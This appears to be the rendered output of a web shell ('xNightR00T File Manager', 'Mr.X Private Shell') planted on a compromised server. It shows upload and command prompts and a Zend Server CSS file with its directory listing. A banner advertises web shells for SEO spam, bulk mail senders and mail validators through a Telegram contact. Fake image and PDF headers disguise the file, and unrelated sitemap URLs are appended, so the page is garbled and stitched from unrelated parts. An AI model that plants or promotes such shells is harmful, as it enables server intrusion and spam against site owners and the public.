xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
@CHARSET "UTF-8";

#ldap-account_canonical_form {
    width: 186px;
}

#ldap-host {
    width: 102px;
}

.simple-modal-toast.message-box {
    clear: right;
    margin: 10px 10px 0 10px;
}

#encryption-selector label {
    display: inline-block;
}

table#users_list_table {
    width: 400px;
}

h3.users-list-table-header {
    background-image: url(/ZendServer/images/settings/Token-Zend-Server-icon.png);
}

table#users_list_table th {
    padding-left: 0;
}

/*table.tableDescContent tr td label {
	display: block;
}*/

#change_password_form_box {
	/*display: none;*/
    padding: 15px;
}

.simple-modal-header h3 {
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    font-size: 12px;
    font-weight: normal;
    line-height: 14px;
}

#ChangePasswordForm input[type="password"] {
    width: 150px;
}

#ChangePasswordForm label {
    line-height: 22px;
	/*float: right;*/
}

div#ldap_properties_enable_box label {
    display: block;
}

.clear-content {
    margin: 25px;
}

.clear-content .content {
    margin: 12px;
}

.radio_select_option_holder h2 {
    margin: 10px 0;
}

.radio_select_option_holder h2 label {
    line-height: 20px;
    font-size: 12pt;
}

.radio_select_option_holder label,
.radio_select_option_holder label input {
    cursor: pointer;
}

.radio_select_option_holder label input {
    vertical-align: middle;
    margin-right: 3px;
}
/*.zend_form dd, .zend_form dt {
	margin-top: 10px;
}*/

dl.zend_form {
    margin: 4px 0 4px 0;
}

#queryCredentials .zend_form dd,
#queryCredentials .zend_form dt {
    margin-top: 4px;
}

/*.zend_form dd, .zend_form dt {
	margin-top: 10px;
}

.zend_form dd {
	margin-left: 40px;
}

.zend_form em {
	display: block;
	margin: 4px 0 0 2px;
}*/

.zend_form dd label input {
    margin-right: 3px;
}

.zend_form dt label {
    display: block;
    line-height: 20px;
}

fieldset {
    width: 500px;
    margin: 12px;
}

form#groups_mapping_form fieldset {
    margin-bottom: 10px;
}

div#submit_formlet {
    margin-top: 6px;
}

#authentication_source_ui_extended {
    overflow-y: auto;
    height: 300px;
}

/*.wizard {
	height: 420px;
}

.wizard fieldset.wizard-page.last-wizard-page .page-wrapper {
	height: 371px;
}

.wizard fieldset.wizard-page {
	width: 384px;
}
.wizard fieldset.wizard-page div.page-wrapper {
	width: 370px;
	height: inherit;
}

.wizard fieldset.page-wrapper, .wizard ul.side-legend {
	height: 400px;
}
*/
.radio_select_option_holder {
    padding-left: 3px;
}

#zend-monitor input[type="radio"] {
    margin-right: 3px;
}

.settings-wrapper {
    margin: 20px 15px;
    padding-top: 11px;
}

.settings-wrapper h2,
.settings-wrapper h3 {
    font-size: 18px;
    font-weight: normal;
    color: #43AFE0;
    padding-left: 16px;
    margin-bottom: 15px;
}

.settings-wrapper h3 {
    font-size: 14px;
    font-weight: bold;
    margin: 10px 0;
}

.settings-wrapper .settings-desc {
    width: 600px;
    margin: 10px 0;
    color: gray;
    margin-left: 45px;
    margin-bottom: 20px;
    margin-top: 15px;
}

.settings-wrapper > form,
.settings-wrapper > table {
    margin-left: 35px;
}

.settings-wrapper label {
    font-size: 12px;
    color: #000;
}

.settings-wrapper input {
    color: #000;
    font-weight: normal;
    font-size: 12px;
}

.settings-wrapper input.strategy-option-values {
    height: 20px;
    margin: 0 5px;
}

.settings-wrapper iframe {
    width: 600px;
    border: 0px;
    height: 65px;
    overflow: hidden;
}

.settings-wrapper td {
    padding-left: 0;
}

.settings-wrapper .zgrid tr.even td,
.settings-wrapper .zgrid tr.odd td {
    padding-left: 10px;
}

.settings-wrapper .zgrid td.no-padding {
    padding: 0 !important;
}

.settings-wrapper .settings-row-description td {
    padding-top: 0;
    color: gray;
    padding-bottom: 20px;
}

.settings-wrapper input[type="submit"].disabled,
.settings-wrapper input[type="submit"]:disabled {
    background: #bababa;
}

.settings-wrapper input[type="submit"] {
    border-radius: 2px;
    background: #43AFE0;
    border: 0px;
    padding: 5px 10px;
    color: #FFF;
}

.settings-wrapper input[type="submit"]:hover,
.settings-wrapper input[type="submit"]:active {
    background: #3893BD;
}

fieldset[disabled="disabled"] .settings-wrapper input[type="submit"]:hover,
fieldset[disabled="disabled"] .settings-wrapper input[type="submit"]:active {
    background: #BABABA;
}

.settings-wrapper .settings-error {
    display: inline-block;
    color: red;
    margin-left: 10px;
}

.settings-wrapper .settings-import-export .zend-form-table-description {
    margin: 10px 0;
}

[cat="zray"][page="settings"] .settings-wrapper tr td label {
    margin-left: 20px;
}

[cat="zray"][page="settings"] .settings-wrapper tr td label:first-of-type {
    margin-left: 0;
}

.settings-wrapper tr td input[type="radio"] {
    margin-right: 2px;
}

.settings-wrapper {
    background: transparent !important;
}

.settings-wrapper#general-settings {
    background: url("/ZendServer/images/settings/general-settings.png") left top no-repeat;
}

.settings-wrapper#devbar-settings {
    background: url("/ZendServer/images/settings/general-settings.png") left top no-repeat;
}

.settings-wrapper#devbar-granularity {
    background: url("/ZendServer/images/settings/general-settings.png") left top no-repeat;
}

.settings-wrapper#devbar-privacy-settings {
    background: url("/ZendServer/images/settings/general-settings.png") left top no-repeat;
}

.settings-wrapper#devbar-access-wrapper {
    background: url("/ZendServer/images/settings/general-settings.png") left top no-repeat;
}

.settings-wrapper#devbar-tokens-wrapper {
    background: url("/ZendServer/images/settings/Token-Zend-Server-icon.png") left top no-repeat;
}

.settings-wrapper#devbar-access {
    background: url("/ZendServer/images/settings/general-settings.png") left top no-repeat;
}

.settings-wrapper#notification-center-settings {
    background: url("/ZendServer/images/settings/notification-center.png") left top no-repeat;
}

.settings-wrapper#audit-trail-settings {
    background: url("/ZendServer/images/settings/audit-trail.png") left top no-repeat;
}

.settings-wrapper#mail-settings {
    background: url("/ZendServer/images/settings/mail-settings.png") left top no-repeat;
}

.settings-wrapper#test-settings {
    background: url("/ZendServer/images/settings/mail-settings.png") left top no-repeat;
}

.settings-wrapper#export-import-settings {
    background: url("/ZendServer/images/settings/export-import.png") left top no-repeat;
}

.settings-wrapper#webserver-errors-settings {
    background: url("/ZendServer/images/settings/error-reporting.png") left top no-repeat;
}

.settings-wrapper#webserver-graceful-restart {
    background: url("/ZendServer/images/settings/sync-restar-icon.png") left top no-repeat;
}

.settings-wrapper#restart-settings {
    background: url("/ZendServer/images/settings/restart-strategy.png") left top no-repeat;
}

#section-server-mode .settings-wrapper {
    background: url("/ZendServer/images/settings/general-settings.png") left top no-repeat;
}

.settings-wrapper#license-settings {
    padding: 0;
    margin-left: 40px;
}

.settings-wrapper#license-settings tr td label {
    width: 100px;
    display: inline-block;
    vertical-align: top;
}

#license-status-box {
    display: inline-block
}

#license-status-box .toast {
    box-shadow: none;
    background-color: transparent;
    background-position: top left;
    border: 0px;
    padding: 0 0 0 31px;
    position: relative;
    display: inline-block;
    left: 0;
    top: 0;
    margin: 0;
    z-index: 3;
}

#section-devbar-access code {
    white-space: nowrap;
    line-height: 30px;
}

#devbar-token-remove {
    margin-top: 7px;
}

#devbar-tokens-information {
    width: 600px;
}

.accessTokenSecurityNotice {
    margin-bottom: 35px;
}

.accessTokenDetails ul {
    margin-top: 0;
    margin-bottom: 0;
}

.accessTokenDetails h3 {
    margin-top: 12px;
    margin-bottom: 4px;
}

input.required {
    border: 1px solid darksalmon;
}

.limited .details {
    font-weight: bold;
}

.settings-wrapper .restart-server-note {
    margin-top: 0;
}

.settings-wrapper .global-restart-server-note {
    margin-top: 15px;
}

.zend-form-table tr td:first-child {
    width: 260px;
}

#selective-access-box .zend-form-table tr td:first-child {
    width: 200px;
}

#selective-access-box #selectiveOperations .zend-form-table tr td:first-child {
    width: auto; /* https://zendtech.atlassian.net/browse/ZSRV-17552 */
}

#selective-access-box .zend-form-table-description {
    margin-left: 18px;
}

#selective-access-box .settings-row-description td {
    padding-top: 0;
}

/* overwrite side-bar defaults */
#files_list li:hover a,
#files_list li.selected a {
    font-weight: normal;
}

.content_box, 
#files_list,
.content_box h2.single-server {
    background: #E3E3E3;
}

#log_display {
	/* overflow: auto; */
}

.log_display {
    margin: 0 0 0 15px;
}

/* end overwrite */

.settings-section:not([ng-show]), {
    display: none;
}

#content_container {
    position: relative;
}

div.DG-spinner-container, div.DG-spinner-wrapper {
    float: left;
    margin-right: 4px;
}

div.DG-spinner-wrapper label {
    clear: both;
    display: block;
}

.DG-spinner-container {
    width: 46px !important;
}

label input {
    vertical-align: -2px;
}

.side-bar {
    position: absolute;
    top: 0;
    left: 0;
}

.progressExtraData pre {
    margin: 0;
}

ul.list-with-descriptions li span {
    display: block;
    margin-top: 3px;
    margin-bottom: 0;
    margin-left: 18px;
}

ul.list-with-descriptions li {
    margin-top: 20px;
    margin-bottom: 8px;
}

ul.list-with-descriptions li:FIRST-CHILD {
    margin-top: 0;
    margin-bottom: 8px;
}

#devbar-tokens-table-wrapper .content {
    border-bottom: 1px #C6DEE8 solid;
    border-top: 1px #C6DEE8 solid;
    border-right: 0;
    border-left: 0;
    padding-left: 14px;
    padding-right: 14px;
}

#devbar-tokens-table-wrapper {
    border: 0;
}

#devbar-tokens-table_table {
    margin-bottom: 0;
}

.auditDetails .content {
    padding: 10px 0 0 10px;
}

.mini-frame {
    width: 650px;
}

/* PRIVACY PAGE STYLES */
#data-masking-configuration {
	margin-top: 50px;
}

#data-masking-configuration-curtain {
	position: absolute;
	background: #FFF;
	opacity: 0.7;
	z-index: 11;
}
.side-notice-box{
margin-left: -30px;
font-size: 13px;
}

h3 .side-notice-box{
    margin-left: -29px;
    margin-top: -2px;
}
.hide-element{
    display: none;
}

Filemanager

Name Type Size Permission Actions
devbar Folder 0755
admin.css File 10.21 KB 0644
appList.css File 3.72 KB 0644
azure.css File 89 B 0644
bootstrap.css File 3.09 KB 0644
charts.css File 267 B 0644
codetracing.css File 11.04 KB 0644
configImport.css File 277 B 0644
configuration.css File 4.1 KB 0644
dashboard.css File 19 B 0644
datepicker_dashboard.css File 5.42 KB 0644
dcpulse.css File 7.75 KB 0644
devbar-azure.css File 3.04 KB 0644
devbar-embedded.css File 28.83 KB 0644
devbar-iframe.css File 4.09 KB 0644
devbar-zray-standalone.css File 1.56 KB 0644
devbar.css File 150.63 KB 0644
error.css File 936 B 0644
events.css File 244 B 0644
expired.css File 6.84 KB 0644
filter.css File 7.95 KB 0644
glyphicons.css File 45.76 KB 0644
guidePageZrayStandalone.css File 1.26 KB 0644
guidepage.css File 16.6 KB 0644
history.css File 6.39 KB 0644
icons.css File 1.12 KB 0644
ipwidget.css File 98 B 0644
issueDetails.css File 3.65 KB 0644
jobqueue_settings.css File 448 B 0644
jobs.css File 1.53 KB 0644
jqpulse.css File 13.77 KB 0644
layout.css File 12.83 KB 0644
libsList.css File 508 B 0644
license.css File 2.48 KB 0644
login.css File 5.09 KB 0644
logs.css File 6.97 KB 0644
monitor-rules.css File 1.37 KB 0644
monitor-settings.css File 1013 B 0644
monitorRule.css File 6.43 KB 0644
pageCache.css File 4.47 KB 0644
plugins.css File 13.78 KB 0644
prereq.css File 519 B 0644
recurringJob.css File 2.43 KB 0644
rulesList.css File 1.14 KB 0644
serverInfo.css File 1.49 KB 0644
servers.css File 607 B 0644
sessionClustering.css File 704 B 0644
simplemodal.css File 975 B 0644
spinner-input.css File 765 B 0644
spinner.css File 1.3 KB 0644
studio.css File 17.42 KB 0644
style.css File 82.54 KB 0644
tags.css File 477 B 0644
toast.css File 1.84 KB 0644
ui-grid-zs.css File 5.07 KB 0644
uploader.css File 1.78 KB 0644
urlinsight.css File 16.69 KB 0644
urlinsightRules.css File 357 B 0644
vhosts.css File 7.26 KB 0644
webApi.css File 251 B 0644
wizard.css File 15.21 KB 0644
z-ray-libs.css File 210.67 KB 0644
z-ray-libs.min.css File 187.41 KB 0644
zgrid.css File 13.86 KB 0644
zmenu.css File 763 B 0644
zray-standalone.css File 810 B 0644
zs-reset.css File 5.56 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml